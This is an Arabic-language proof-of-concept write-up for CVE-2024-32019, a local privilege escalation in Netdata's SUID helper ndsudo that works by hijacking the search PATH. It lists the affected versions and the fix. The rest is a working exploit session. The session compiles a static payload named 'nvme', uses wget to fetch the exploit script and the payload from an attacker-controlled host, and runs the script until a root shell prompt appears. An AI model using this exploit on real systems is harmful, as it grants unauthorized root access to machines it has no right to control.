
إثبات مفهوم لتصعيد الامتيازات في Netdata ndsudo
CVE-2024-32019 هي ثغرة تصعيد امتيازات محلية في مساعد SUID الخاص بـ Netdata والمسمى ndsudo، والتي تتيح لمستخدم محلي تنفيذ برامج عشوائية بصلاحيات الجذر عبر مسار بحث غير موثوق (اختطاف PATH).
تظهر المشكلة لأن ndsudo يقيد أسماء الأوامر ولكنه يحلها باستخدام PATH الخاص بالمستدعي، مما يسمح للمستخدم بوضع ملف ثنائي خبيث في مقدمة PATH وجعل ndsudo ينفذه بصلاحيات الجذر.
تؤثر الثغرة على إصدارات Netdata Agent ≥ v1.45.0 و < v1.45.3، و ≥ v1.44.0-60 و < v1.45.0-169، وتبلغ درجة خطورتها 8.8 وفقًا لمعيار CVSS v3.1 (عالية).
يتمثل الإصلاح في الترقية إلى v1.45.3 أو v1.45.0-169؛ وتصنف الثغرة ضمن CWE-426 (مسار بحث غير موثوق).
gcc -static payload.c -o nvme -Wall -Werror -Wpedantic
test@ubuntu:/tmp$ wget http://192.168.100.7:8000/CVE-2024-32019.sh
--2025-09-10 23:49:01-- http://192.168.100.7:8000/CVE-2024-32019.sh
Connecting to 192.168.100.7:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 712 [application/x-sh]
Saving to: ‘CVE-2024-32019.sh’
CVE-2024-32019.sh 100%[==================================================>] 712 --.-KB/s in 0s
2025-09-10 23:49:01 (57.1 MB/s) - ‘CVE-2024-32019.sh’ saved [712/712]
test@ubuntu:/tmp$ wget http://192.168.100.7:8000/nvme
--2025-09-10 23:49:10-- http://192.168.100.7:8000/nvme
Connecting to 192.168.100.7:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 832552 (813K) [application/octet-stream]
Saving to: ‘nvme’
nvme 100%[==================================================>] 813.04K 1.98MB/s in 0.4s
2025-09-10 23:49:11 (1.98 MB/s) - ‘nvme’ saved [832552/832552]
test@ubuntu:/tmp$ sh CVE-2024-32019.sh
[+] ndsudo found at: /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
[+] File 'nvme' found in the current directory.
[+] Execution permissions granted to ./nvme
[+] Running ndsudo with modified PATH:
root@ubuntu:/tmp#